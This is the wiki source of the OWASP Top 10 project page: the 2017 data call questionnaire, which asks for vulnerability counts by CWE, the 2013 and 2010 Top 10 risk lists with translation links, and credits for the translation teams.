DATA CALL RESULTS ARE NOW PUBLIC: The [https://github.com/OWASP/Top10/blob/master/2017/datacall/OWASP%20Top%2010%20-%202017%20Data%20Call-Public%20Release.xlsx?raw=true results of this data call have been made public here] as an Excel spreadsheet with 4 tabs. Three of the tabs have raw data as submitted, organized into three vulnerability data size categories: large, small, and none. A 4th tab includes some basic analysis of the large size submissions. The OWASP Top 10 project thanks all the submitters for their input to the OWASP Top 10 - 2017.&lt;br /&gt;
&lt;br /&gt;
On May 20, 2016, the Top 10 project made a public announcement of the data call for the 2017 update to the OWASP Top 10. Contributors filled out the Google form posted here:  [https://docs.google.com/forms/d/1sBMHN5nBicjr5xSo04xkdP5JlCnXFcKFCgEHjwPGuLw/viewform?c=0&amp;amp;w=1&amp;amp;usp=mail_form_link OWASP Top 10 - 2017 Data Call], which had the questions listed below.&lt;br /&gt;
&lt;br /&gt;
Page 1 of 5: Submitter Info&lt;br /&gt;
&lt;br /&gt;
* Name of Company/Organization *&lt;br /&gt;
* Company/Organization Web Site *&lt;br /&gt;
* Point of Contact Name *&lt;br /&gt;
* Point of Contact E-Mail *&lt;br /&gt;
&lt;br /&gt;
Page 2 of 5: Background on Applications&lt;br /&gt;
&lt;br /&gt;
* During what year(s) was this data collected? *&lt;br /&gt;
** 2014&lt;br /&gt;
** 2015&lt;br /&gt;
** Both 2014 &amp;amp; 2015&lt;br /&gt;
*** If the application vulnerability data you are submitting was extracted from a publicly available report, please provide a link to that report (or reports), and the relevant page number(s)&lt;br /&gt;
&lt;br /&gt;
* How many web applications do the submitted results cover? * We consider web apps, web services, and the server side of mobile apps to all be web apps.&lt;br /&gt;
&lt;br /&gt;
* What were the primary programming languages the applications you reviewed written in? Primary being 5% or more of the supplied results - Check all that apply&lt;br /&gt;
** Java&lt;br /&gt;
** .NET&lt;br /&gt;
** Python&lt;br /&gt;
** PHP&lt;br /&gt;
** Ruby&lt;br /&gt;
** Grails&lt;br /&gt;
** Play&lt;br /&gt;
** Node.js&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
* Please supply the exact percentage of applications per language checked off above:&lt;br /&gt;
&lt;br /&gt;
* What were the primary industries these applications supported? Primary being 5% or more of the supplied results - Check all that apply&lt;br /&gt;
** Financial&lt;br /&gt;
** Healthcare&lt;br /&gt;
** eCommerce&lt;br /&gt;
** Internet/Social Media&lt;br /&gt;
** Airline&lt;br /&gt;
** Energy&lt;br /&gt;
** Entertainment (Games/Music/Movies)&lt;br /&gt;
** Government&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
* Where in the world were the application owners primarily? Again - select those where 5% or more of your results came from&lt;br /&gt;
** North America&lt;br /&gt;
** Europe&lt;br /&gt;
** AsiaPac&lt;br /&gt;
** South America&lt;br /&gt;
** Middle East&lt;br /&gt;
** Africa&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
Page 3 of 5: Assessment Team and Detection Approach&lt;br /&gt;
&lt;br /&gt;
* What type of team did the bulk of this work? *&lt;br /&gt;
** Internal Assessment Team(s)&lt;br /&gt;
** Consulting Organization&lt;br /&gt;
** Product Vendor/Service Provider (e.g., SaaS)&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
*What type of analysis tools do they use? * Check all that apply.&lt;br /&gt;
** Free/Open Source Static Application Security Testing (SAST) Tools&lt;br /&gt;
** Free/Open Source Dynamic Application Security Testing (DAST) Tools&lt;br /&gt;
** Free/Open Source Interactive Application Security Testing (IAST) Tools&lt;br /&gt;
** Commercial Static Application Security Testing (SAST) Tools&lt;br /&gt;
** Commercial Dynamic Application Security Testing (DAST) Tools&lt;br /&gt;
** Commercial Interactive Application Security Testing (IAST) Tools&lt;br /&gt;
** Commercial DAST/IAST Hybrid Analysis Tools&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
* Which analysis tools do you frequently use? This includes both free, commercial, and custom (in house) tools - List tools by name&lt;br /&gt;
&lt;br /&gt;
* What is your primary assessment methodology? * Primary being the majority of your assessments follow this approach&lt;br /&gt;
** Raw (untriaged) output of automated analysis tool results using default rules&lt;br /&gt;
** Automated analysis tool results - with manual false positive analysis/elimination&lt;br /&gt;
** Output from manually tailored automated analysis tool(s)&lt;br /&gt;
** Output from manually tailored automated analysis tool(s) - with manual false positive analysis/elimination&lt;br /&gt;
** Manual expert penetration testing (Expected to be tool assisted w/ free DAST tool(s))&lt;br /&gt;
** Manual expert penetration testing with commercial DAST tool(s)&lt;br /&gt;
** Manual expert code review (Using IDE and other free code review aids)&lt;br /&gt;
** Manual expert code review with commercial SAST tool(s)&lt;br /&gt;
** Combined manual expert code review and penetration testing with only free tools&lt;br /&gt;
** Combined manual expert code review and penetration testing with only commercial tools&lt;br /&gt;
** Other:&lt;br /&gt;
&lt;br /&gt;
Page 4 of 5: Application Vulnerability Data&lt;br /&gt;
&lt;br /&gt;
Each question asks the number of vulnerabilities found for a particular type of vulnerability. At the end, is one catch all text question where you can add other types of vulnerabilities and their counts. If you prefer, just send your vulnerability data in a spreadsheet to brian.glas@owasp.org with these columns: CATEGORY NAME, CWE #, COUNT after you submit the rest of your input via this data call. ideally it would come from the email address you specified in the Point of Contact E-Mail question on Page 1 so its easy to correlate the two.&lt;br /&gt;
&lt;br /&gt;
* Number of SQL Injection Vulnerabilities Found (CWE-89)?&lt;br /&gt;
* Number of Hibernate Injection Vulnerabilities Found (CW-564)?&lt;br /&gt;
* Number of Command Injection Vulnerabilities Found (CWE-77)?&lt;br /&gt;
* Number of Authentication Vulnerabilities Found (CWE-287)?&lt;br /&gt;
* Number of Session Fixation Vulnerabilities Found (CWE-384)?&lt;br /&gt;
* Number of Cross-Site Scripting (XSS) Vulnerabilities Found (CWE-79)?&lt;br /&gt;
* Number of DOM-Based XSS Vulnerabilities Found (No CWE)?&lt;br /&gt;
* Number of Insecure Direct Object Reference Vulnerabilities Found (CWE-639)?&lt;br /&gt;
* Number of Path Traversal Vulnerabilities Found (CWE-22)?&lt;br /&gt;
* Number of Missing Authorization Vulnerabilities Found (CWE-285)?&lt;br /&gt;
* Number of Security Misconfiguration Vulnerabilities Found (CWE-2)?&lt;br /&gt;
* Number of Cleartext Transmission of Sensitive Information Vulnerabilities Found (CWE-319)?&lt;br /&gt;
* Number of Cleartext Storage of Sensitive Information Vulnerabilities Found (CWE-312)?&lt;br /&gt;
* Number of Weak Encryption Vulnerabilities Found (CWE-326)?&lt;br /&gt;
* Number of Cryptographic Vulnerabilities Found (CWEs-310/326/327/etc)?&lt;br /&gt;
** You can report them all lumped together in 310 or in their individual categories. However you want.&lt;br /&gt;
* Number of Improper (Function Level) Access Control Vulnerabilities Found (CWE-285)?&lt;br /&gt;
* Number of Cross-Site Request Forgery (CSRF) Vulnerabilities Found (CWE-352)?&lt;br /&gt;
* Number of Use of Known Libraries Found (No CWE)?&lt;br /&gt;
* Number of Unchecked Redirect Vulnerabilities Found (CWE-601)?&lt;br /&gt;
* Number of Unvalidated Forward Vulnerabilities Found (No CWE)?&lt;br /&gt;
* Number of Clickjacking Vulnerabilities Found (No CWE)?&lt;br /&gt;
* Number of XML eXternal Entity Injection (XXE) Vulnerabilities Found (CWE-611)?&lt;br /&gt;
* Number of Server-Side Request Forgery (SSRF) Vulnerabilities Found (CWE-918)?&lt;br /&gt;
* Number of Denial of Service (DOS) Vulnerabilities Found (CWE-400)?&lt;br /&gt;
* Number of Expression Language Injection Vulnerabilities Found (CWE-917)?&lt;br /&gt;
* Number of Error Handling Vulnerabilities Found (CWE-388)?&lt;br /&gt;
* Number of Information Leakage/Disclosure Vulnerabilities Found (CWE-200)?&lt;br /&gt;
* Number of Insufficient Anti-automation Vulnerabilities Found (CWE-799)?&lt;br /&gt;
* Number of Insufficient Security Logging Vulnerabilities Found (CWE-778)?&lt;br /&gt;
* Number of Insufficient Intrusion Detection and Response Vulnerabilities Found (No CWE)?&lt;br /&gt;
* Number of Mass Assignment Vulnerabilities Found (CWE-915)?&lt;br /&gt;
* What other vulnerabilities did you find?&lt;br /&gt;
** Please provide in this format: CATEGORY NAME, CWE #, COUNT (one line per category). Say &amp;quot;No CWE&amp;quot; if there isn't a CWE # for that category. If you plan to send all your vulnerability data in via an email, please state so here so we know to expect it.&lt;br /&gt;
&lt;br /&gt;
Page 5 of 5: Suggestions for the next OWASP Top 10&lt;br /&gt;
&lt;br /&gt;
What do you think we should change?&lt;br /&gt;
&lt;br /&gt;
* Vulnerability types you think should be added to the T10? Because they are an unappreciated risk, widespread, becoming more prevalent, a new type of vulnerability, etc.&lt;br /&gt;
* Vulnerability types you think should be removed from the T10?&lt;br /&gt;
* Suggested changes to the Top 10 Document/Wiki?&lt;br /&gt;
* Suggestions on how to improve this call for data?&lt;br /&gt;
&lt;br /&gt;
== Project Sponsors ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 project is sponsored by {{MemberLinks|link=https://www.aspectsecurity.com|logo=Aspect_logo_owasp.jpg}}&lt;br /&gt;
&lt;br /&gt;
= OWASP Top 10 for 2013 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On June 12, 2013 the OWASP Top 10 for 2013 was officially released. This version was updated based on numerous comments received during the comment period after the release candidate was released in Feb. 2013.&lt;br /&gt;
&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013.pdf OWASP Top 10 2013 document (PDF)].&lt;br /&gt;
* [[Top_10_2013 | OWASP Top 10 2013 - Wiki.]]&lt;br /&gt;
* [https://www.owasp.org/images/6/6a/OWASP_TOP_10_2013_Arabic.pdf OWASP Top 10 2013 - Arabic (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/5/51/OWASP_Top_10_2013-Chinese-V1.2.pdf OWASP Top 10 2013 - Chinese (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/f/f3/OWASP_Top_10_-_2013_Final_-_Czech_V1.1.pdf OWASP Top 10 2013 - Czech (PDF)].&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013%20-%20French.pdf OWASP Top 10 2013 - French (PDF)].&lt;br /&gt;
* [[media:OWASP_Top_10_2013_DE_Version_1_0.pdf | OWASP Top 10 2013 - German (PDF)]] &lt;br /&gt;
* [[OWASP_Top10_Hebrew|OWASP Top 10 2013 - Hebrew]] [https://www.owasp.org/images/1/1b/OWASP_Top_10_2013-Hebrew.pdf (PDF)]&lt;br /&gt;
* [https://www.owasp.org/images/c/c9/OWASP_Top_10_-_2013_-_Italiano.pdf OWASP Top 10 2013 - Italian (PDF)]&lt;br /&gt;
* [https://www.owasp.org/images/7/79/OWASP_Top_10_2013_JPN.pdf OWASP Top 10 2013 - Japanese (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/2/2c/OWASP_Top_10_-_2013_Final_-_Korean.pdf OWASP Top 10 2013 - Korea (PDF)].&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top_10_-_2013_Brazilian_Portuguese.pdf OWASP Top 10 2013 - Brazilian Portuguese (PDF)].&lt;br /&gt;
* [https://www.owasp.org/images/5/5f/OWASP_Top_10_-_2013_Final_-_Espa%C3%B1ol.pdf OWASP Top 10 2013 - Spanish (PDF)]&lt;br /&gt;
* [https://www.owasp.org/images/e/e3/OWASP_Top_10_-_2013_Final_Ukrainian.pdf OWASP Top 10 2013 - Ukrainian (PDF)]&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top-10_2013%20-%20Presentation.pptx OWASP Top 10 2013 Presentation - Presenting Each Item in the Top 10 (PPTX)].&lt;br /&gt;
&lt;br /&gt;
For 2013, the OWASP Top 10 Most Critical Web Application Security Risks are:&lt;br /&gt;
&lt;br /&gt;
* [[Top_10_2013-A1-Injection | A1 Injection]]&lt;br /&gt;
* [[Top_10_2013-A2-Broken_Authentication_and_Session_Management | A2 Broken Authentication and Session Management]]&lt;br /&gt;
* [[Top_10_2013-A3-Cross-Site_Scripting_(XSS) | A3 Cross-Site Scripting (XSS)]]&lt;br /&gt;
* [[Top_10_2013-A4-Insecure_Direct_Object_References | A4 Insecure Direct Object References]]&lt;br /&gt;
* [[Top_10_2013-A5-Security_Misconfiguration | A5 Security Misconfiguration]]&lt;br /&gt;
* [[Top_10_2013-A6-Sensitive_Data_Exposure | A6 Sensitive Data Exposure]]&lt;br /&gt;
* [[Top_10_2013-A7-Missing_Function_Level_Access_Control | A7 Missing Function Level Access Control]]&lt;br /&gt;
* [[Top_10_2013-A8-Cross-Site_Request_Forgery_(CSRF) | A8 Cross-Site Request Forgery (CSRF)]]&lt;br /&gt;
* [[Top_10_2013-A9-Using_Components_with_Known_Vulnerabilities | A9 Using Components with Known Vulnerabilities]]&lt;br /&gt;
* [[Top_10_2013-A10-Unvalidated_Redirects_and_Forwards | A10 Unvalidated Redirects and Forwards]]&lt;br /&gt;
&lt;br /&gt;
If you are interested, the methodology for how the Top 10 is produced is now documented here: [[Top_10_2013/ProjectMethodology | OWASP Top 10 Development Methodology]]&lt;br /&gt;
&lt;br /&gt;
Please help us make sure every developer in the ENTIRE WORLD knows about the OWASP Top 10 by helping to spread the word!!! &lt;br /&gt;
&lt;br /&gt;
As you help us spread the word, please emphasize: &lt;br /&gt;
&lt;br /&gt;
*OWASP is reaching out to developers, not just the application security community &lt;br /&gt;
*The Top 10 is about managing risk, not just avoiding vulnerabilities &lt;br /&gt;
*To manage these risks, organizations need an application risk management program, not just awareness training, app testing, and remediation&lt;br /&gt;
&lt;br /&gt;
We need to encourage organizations to get off the penetrate and patch mentality. As Jeff Williams said in his 2009 OWASP AppSec DC Keynote: “we’ll never hack our way secure – it’s going to take a culture change” for organizations to properly address application security.&lt;br /&gt;
&lt;br /&gt;
== Introduction ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list. Versions of the 2007 and 2010 version were translated into English, French, Spanish, Japanese, Korean and Turkish and other languages. The 2013 version was translated into even more languages.&lt;br /&gt;
&lt;br /&gt;
We urge all companies to adopt this awareness document within their organization and start the process of ensuring that their web applications minimize these risks. Adopting the OWASP Top 10 is perhaps the most effective first step towards changing the software development culture within your organization into one that produces secure code.&lt;br /&gt;
&lt;br /&gt;
== Changes between 2010 and 2013 Editions ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 - 2013 includes the following changes as compared to the 2010 edition:&lt;br /&gt;
&lt;br /&gt;
* A1 Injection&lt;br /&gt;
* A2 Broken Authentication and Session Management (was formerly 2010-A3)&lt;br /&gt;
* A3 Cross-Site Scripting (XSS) (was formerly 2010-A2)&lt;br /&gt;
* A4 Insecure Direct Object References&lt;br /&gt;
* A5 Security Misconfiguration (was formerly 2010-A6)&lt;br /&gt;
* A6 Sensitive Data Exposure (2010-A7 Insecure Cryptographic Storage and 2010-A9 Insufficient Transport Layer Protection were merged to form 2013-A6)&lt;br /&gt;
* A7 Missing Function Level Access Control (renamed/broadened from 2010-A8 Failure to Restrict URL Access)&lt;br /&gt;
* A8 Cross-Site Request Forgery (CSRF) (was formerly 2010-A5)&lt;br /&gt;
* A9 Using Components with Known Vulnerabilities (new but was part of 2010-A6 – Security Misconfiguration)&lt;br /&gt;
* A10 Unvalidated Redirects and Forwards&lt;br /&gt;
&lt;br /&gt;
== Other 2013 Top 10 Docs ==&lt;br /&gt;
&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013%20-%20RC1.pdf OWASP Top 10 - 2013 - Release Candidate]&lt;br /&gt;
*[https://www.owasp.org/images/3/3d/OWASP_Top_10_-_2013_Final_Release_-_Change_Log.docx OWASP Top 10 - 2013 - Final Release - Change Log (docx)]&lt;br /&gt;
* [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top-10_2013%20-%20Changes-from-2010.pptx Focusing on What Changed Since 2010 (PPTX)]&lt;br /&gt;
&lt;br /&gt;
[[File:OWASP_Web_Top_10_for_2013.png]]&lt;br /&gt;
&lt;br /&gt;
== Feedback ==&lt;br /&gt;
&lt;br /&gt;
Please let us know how your organization is using the OWASP Top 10. Include your name, organization's name, and brief description of how you use the list. Thanks for supporting OWASP! &lt;br /&gt;
&lt;br /&gt;
We hope you find the information in the OWASP Top 10 useful. Please contribute back to the project by sending your comments, questions, and suggestions to topten@lists.owasp.org. Thanks! &lt;br /&gt;
&lt;br /&gt;
To join the OWASP Top 10 mailing list or view the archives, please visit the [http://lists.owasp.org/mailman/listinfo/owasp-topten subscription page.] &lt;br /&gt;
&lt;br /&gt;
== Project Sponsors ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 project is sponsored by {{MemberLinks|link=https://www.aspectsecurity.com|logo=Aspect_logo_owasp.jpg}}&lt;br /&gt;
&lt;br /&gt;
&amp;lt;!-- ==== Project Identification ====&lt;br /&gt;
{{Template:OWASP OWASP_Top10 Project}} --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
= OWASP Top 10 for 2010 =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
On April 19, 2010 the final version of the OWASP Top 10 for 2010 was released, and here is the associated [[OWASPTop10-2010-PressRelease|press release]]. This version was updated based on numerous comments received during the comment period after the release candidate was released in Nov. 2009. &lt;br /&gt;
&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010.pdf OWASP Top 10 - 2010 Document] &lt;br /&gt;
*[[Top 10 2010|OWASP Top 10 - 2010 - wiki]] &lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP_Top_10_-_2010%20Presentation.pptx OWASP Top 10 - 2010 Presentation]&lt;br /&gt;
*[http://blip.tv/owasp-appsec-conference-in-europe/day2_track1_1430-1505-3936900 OWASP Top 10 Video of the Presentation above - this focused alot on the Top 10 for 2010 approach, rather than the details. (From OWASP AppSec EU 2010)]&lt;br /&gt;
*[http://www.vimeo.com/9006276 OWASP Top 10 Video of this Presentation when the Top 10 for 2010 was 1st released for comment - this goes through each item in the Top 10. (From OWASP AppSec DC 2009)]&lt;br /&gt;
&lt;br /&gt;
For 2010, the OWASP Top 10 Most Critical Web Application Security Risks are: &lt;br /&gt;
&lt;br /&gt;
*[[Top_10_2010-A1|A1: Injection]]&lt;br /&gt;
*[[Top_10_2010-A2|A2: Cross-Site Scripting (XSS)]]&lt;br /&gt;
*[[Top_10_2010-A3|A3: Broken Authentication and Session Management]]&lt;br /&gt;
*[[Top_10_2010-A4|A4: Insecure Direct Object References]]&lt;br /&gt;
*[[Top_10_2010-A5|A5: Cross-Site Request Forgery (CSRF)]]&lt;br /&gt;
*[[Top_10_2010-A6|A6: Security Misconfiguration]]&lt;br /&gt;
*[[Top_10_2010-A7|A7: Insecure Cryptographic Storage]]&lt;br /&gt;
*[[Top_10_2010-A8|A8: Failure to Restrict URL Access]]&lt;br /&gt;
*[[Top_10_2010-A9|A9: Insufficient Transport Layer Protection]]&lt;br /&gt;
*[[Top_10_2010-A10|A10: Unvalidated Redirects and Forwards]]&lt;br /&gt;
&lt;br /&gt;
== Introduction ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 is a powerful awareness document for web application security. It represents a broad consensus about the most critical security risks to web applications. Project members include a variety of security experts from around the world who have shared their expertise to produce this list. Versions of the 2007 were translated into English, French, Spanish, Japanese, Korean and Turkish and other languages and the 2010 version was translated into even more languages. See below for all the translated versions.&lt;br /&gt;
&lt;br /&gt;
== 2010 Versions ==&lt;br /&gt;
&lt;br /&gt;
2010 Edition: &lt;br /&gt;
&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010.pdf OWASP Top 10 2010 - PDF] &lt;br /&gt;
*[[Top 10 2010|OWASP Top 10 2010 - wiki]]&lt;br /&gt;
&lt;br /&gt;
2010 Translations: &lt;br /&gt;
&lt;br /&gt;
*[https://www.owasp.org/images/a/a9/OWASP_Top_10_2010_Chinese_V1.0_Released.pdf OWASP Top 10 2010 - Chinese PDF / 这里下载PDF格式文档]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20French.pdf OWASP Top 10 2010 - French PDF] &lt;br /&gt;
*[[media:OWASPTop10_2010_DE_Version_1_0.pdf | OWASP Top 10 2010 - German PDF]]&lt;br /&gt;
*[https://www.owasp.org/images/c/cd/OWASP_Top_10_Heb.pdf OWASP Top 10 2010 - Hebrew PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Indonesian.pdf OWASP Top 10 2010 - Indonesian PDF]&lt;br /&gt;
*[https://www.owasp.org/images/f/f9/OWASP_Top_10_-_2010_ITA.pdf OWASP Top 10 2010 - Italian PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Japanese-A4.pdf OWASP Top 10 2010 - Japanese PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Korean.pdf OWASP Top 10 2010 - Korean PDF]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202010%20Spanish.pdf OWASP Top 10 2010 - Spanish PDF]&lt;br /&gt;
*[https://www.owasp.org/images/8/86/OWASP_Top_10_-_2010_FINAL_%28spanish%29.pptx OWASP Top 10 2010 - Spanish PPT]&lt;br /&gt;
*[https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASPTop%2010%20-%202010%20Vietnamese.pdf OWASP Top 10 2010 - Vietnamese PDF]&lt;br /&gt;
&lt;br /&gt;
2010 Release Candidate: &lt;br /&gt;
&lt;br /&gt;
*[https://www.owasp.org/index.php/File:OWASP_T10_-_2010_rc1.pdf OWASP Top 10 2010 Release Candidate] &lt;br /&gt;
*[https://www.owasp.org/images/e/e1/OWASP_Top_10_RC-Public_Comments.docx OWASP Top 10 2010 Release Candidate Comments], except for one set of scanned comments [https://www.owasp.org/images/2/2e/OWASP_T10_-_2010_rc1_cmts_Kai_Jendrian.pdf which are here].&lt;br /&gt;
&lt;br /&gt;
Previous versions: &lt;br /&gt;
&lt;br /&gt;
*[https://www.owasp.org/images/e/e8/OWASP_Top_10_2007.pdf OWASP Top 10 2007 - PDF] &lt;br /&gt;
*[[Top 10 2007|OWASP Top 10 2007 - wiki]] &lt;br /&gt;
*[https://www.owasp.org/index.php/Category:OWASP_Top_Ten_Project#tab=Project_Details OWASP Top 10 2007 - PDF Translations are here] &lt;br /&gt;
*[[Top 10 2004|OWASP Top 10 2004 - wiki]]&lt;br /&gt;
&lt;br /&gt;
== Project Sponsors ==&lt;br /&gt;
&lt;br /&gt;
The OWASP Top 10 project is sponsored by {{MemberLinks|link=https://www.aspectsecurity.com|logo=Aspect_logo_owasp.jpg}}&lt;br /&gt;
&lt;br /&gt;
= Translation Efforts =&lt;br /&gt;
&lt;br /&gt;
&amp;lt;div style=&amp;quot;width:100%;height:160px;border:0,margin:0;overflow: hidden;&amp;quot;&amp;gt;[[File:OWASP_Project_Header.jpg|link=]]&amp;lt;/div&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Efforts are already underway to translate the OWASP Top 10 for 2017. NOTE: This is still a '''release candidate''' so will definitely change before it's final. To avoid rework, you might want to wait until the final is released.If you are interested in helping, please contact the members of the team for the language you are interested in contributing to, or if you don't see your language listed, please let me know you want to help and we'll form a volunteer group for your language.&lt;br /&gt;
&lt;br /&gt;
Here is the original source document for the [https://github.com/OWASP/Top10/raw/master/2017/OWASP%20Top%2010%20-%202017%20RC1-English.pptx OWASP Top 10 - 2017 '''Release Candidate''' which is in PowerPoint]. Please use this document as the basis for your translation efforts. &lt;br /&gt;
&lt;br /&gt;
2017 Release Candidate Translation Teams:&lt;br /&gt;
&lt;br /&gt;
* French: Ludovic Petit: Ludovic.Petit@owasp.org, Sébastien Gioria: Sebastien.Gioria@owasp.org. &lt;br /&gt;
* Chinese: 王颉、包悦忠、Rip、顾凌志、王厚奎、王文君、吴楠、夏天泽、夏玉明、杨天识、袁明坤、张镇(排名不分先后，按姓氏拼音排列)  [https://www.owasp.org/images/8/8f/OWASP_Top_10_2017（RC1）中文版（V1.0）.pdf OWASP Top10 2017 RC1 - Chinese PDF]&lt;br /&gt;
* Azerbaijanian: Rashad Aliyev (rashad@aliev.info)&lt;br /&gt;
* Others to be listed.&lt;br /&gt;
&lt;br /&gt;
2013 Completed Translations:&lt;br /&gt;
&lt;br /&gt;
* Arabic: [https://www.owasp.org/images/6/6a/OWASP_TOP_10_2013_Arabic.pdf OWASP Top 10 2013 - Arabic PDF]  Translated by: Mohannad Shahat: Mohannad.Shahat@owasp.org, Fahad: @SecurityArk, Abdulellah Alsaheel: cs.saheel@gmail.com, Khalifa Alshamsi: Khs1618@gmail.com and Sabri(KING SABRI): king.sabri@gmail.com, Mohammed Aldossary: mohammed.aldossary@owasp.org&lt;br /&gt;
* Chinese 2013：中文版2013 [https://www.owasp.org/images/5/51/OWASP_Top_10_2013-Chinese-V1.2.pdf OWASP Top 10 2013 - Chinese (PDF)]. 项目组长： Rip 王颉， 参与人员： 陈亮、 顾庆林、 胡晓斌、 李建蒙、 王文君、 杨天识、 张在峰&lt;br /&gt;
* Czech 2013: [https://www.owasp.org/images/f/f3/OWASP_Top_10_-_2013_Final_-_Czech_V1.1.pdf OWASP Top 10 2013 - Czech (PDF)] [https://www.owasp.org/images/0/02/OWASP_Top_10_-_2013_Final_-_Czech_V1.1.pptx OWASP Top 10 2013 - Czech (PPTX)] CSIRT.CZ - CZ.NIC, z.s.p.o. (.cz domain registry): Petr Zavodsky: petr.zavodsky@owasp.org, Vaclav Klimes, Zuzana Duracinska, Michal Prokop, Edvard Rejthar, Pavel Basta&lt;br /&gt;
*French 2013: [https://storage.googleapis.com/google-code-archive-downloads/v2/code.google.com/owasptop10/OWASP%20Top%2010%20-%202013%20-%20French.pdf OWASP Top 10 2013 - French PDF] Ludovic Petit: Ludovic.Petit@owasp.org, Sébastien Gioria: Sebastien.Gioria@owasp.org, Erwan Abgrall: g4l4drim@gmail.com, Benjamin Avet: benjamin.avet@gmail.com, Jocelyn Aubert: jocelyn.aubert@owasp.org, Damien Azambour: damien.azambourg@owasp.org, Aline Barthelemy: aline.barthelemy@fr.abb.com, Moulay Abdsamad Belghiti: abdsamad.belghiti@gmail.com, Gregory Blanc: gregory.blanc@gmail.com, Clément Capel: clement.capel@sfr.com, Etienne Capgras: Etienne.capgras@solucom.fr, Julien Cayssol: julien@aqwz.com, Antonio Fontes: antonio.fontes@owasp.org, Ely de Travieso: Ely.detravieso@owasp.org, Nicolas Grégoire: nicolas.gregoire@agarri.fr, Valérie Lasserre: valerie.lasserre@gmx.fr, Antoine Laureau: antoine.laureau@owasp.org, Guillaume Lopes: lopes.guillaume@free.fr, Gilles Morain: gilles.morain@gmail.com, Christophe Pekar: christophe.pekar@owasp.org, Olivier Perret: perrets@free.fr, Michel Prunet: michel.prunet@owasp.org, Olivier Revollat: revollat@gmail.com, Aymeric Tabourin: aymeric.tabourin@orange.com&lt;br /&gt;
* German 2013: [[media:OWASP_Top_10_2013_DE_Version_1_0.pdf | OWASP Top 10 2013 - German PDF]] top10@owasp.de which is Frank Dölitzscher, Torsten Gigler, Tobias Glemser, Dr. Ingo Hanke, Thomas Herzog, [[User:Kai_Jendrian|Kai Jendrian]], [[User:Ralf_Reinhardt|Ralf Reinhardt]], Michael Schäfer&lt;br /&gt;
* Hebrew 2013: [[OWASP_Top10_Hebrew|OWASP Top 10 2013 - Hebrew]] [https://www.owasp.org/images/1/1b/OWASP_Top_10_2013-Hebrew.pdf PDF] Translated by: Or Katz, Eyal Estrin, Oran Yitzhak, Dan Peled, Shay Sivan.&lt;br /&gt;
